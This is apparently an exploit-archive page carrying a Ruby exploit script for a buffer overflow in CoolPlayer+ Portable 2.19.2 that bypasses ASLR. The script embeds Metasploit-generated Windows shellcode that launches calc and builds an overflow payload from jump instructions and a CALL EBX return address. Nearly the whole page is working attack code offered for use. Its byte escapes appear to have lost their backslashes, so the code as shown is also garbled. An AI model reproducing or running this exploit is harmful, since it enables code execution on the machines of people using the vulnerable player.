[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CoolPlayer+ Portable 2.19.2 Buffer Overflow ASLR Bypass (Large Shellcode)
# Published : 2012-08-06
# Author :
# Previous Title : Aviosoft Digital TV Player Professional 1.x (Direct Retn)
# Next Title : NVidia Display Driver Service (Nsvr) Exploit


#!/usr/bin/ruby

# Exploit for CoolPlayer+ Portable 2.19.2
#
# Based on exploit by Blake and Dhruval.
# Vulnerability found by Securityxxxpert
# Original: http://www.exploit-db.com/exploits/20262/
#
# This one by Robert Larsen <robert@the-playground.dk>
# Lots of room for shellcode as opposed to original exploit.

# Shellcode created with:
# msfpayload windows/exec CMD=calc R | msfencode -b 'x00x0ax0c'
SHELLCODE=
"xdaxd6xd9x74x24xf4xb8x3axbdx65xf7x5ex31xc9" +
"xb1x32x31x46x17x03x46x17x83xd4x41x87x02xd4" +
"x52xc1xedx24xa3xb2x64xc1x92xe0x13x82x87x34" +
"x57xc6x2bxbex35xf2xb8xb2x91xf5x09x78xc4x38" +
"x89x4cxc8x96x49xcexb4xe4x9dx30x84x27xd0x31" +
"xc1x55x1bx63x9ax12x8ex94xafx66x13x94x7fxed" +
"x2bxeexfax31xdfx44x04x61x70xd2x4ex99xfaxbc" +
"x6ex98x2fxdfx53xd3x44x14x27xe2x8cx64xc8xd5" +
"xf0x2bxf7xdaxfcx32x3fxdcx1ex41x4bx1fxa2x52" +
"x88x62x78xd6x0dxc4x0bx40xf6xf5xd8x17x7dxf9" +
"x95x5cxd9x1dx2bxb0x51x19xa0x37xb6xa8xf2x13" +
"x12xf1xa1x3ax03x5fx07x42x53x07xf8xe6x1fxa5" +
"xedx91x7dxa3xf0x10xf8x8axf3x2ax03xbcx9bx1b" +
"x88x53xdbxa3x5bx10x13xeexc6x30xbcxb7x92x01" +
"xa1x47x49x45xdcxcbx78x35x1bxd3x08x30x67x53" +
"xe0x48xf8x36x06xffxf9x12x65x9ex69xfex6a"

payload = "xebx4e" * (232 / 2) + #JMP 80
          "x5dxecxf8x77"     + #CALL EBX
          "x90x90x90x90"     + #Junk
          SHELLCODE

puts payload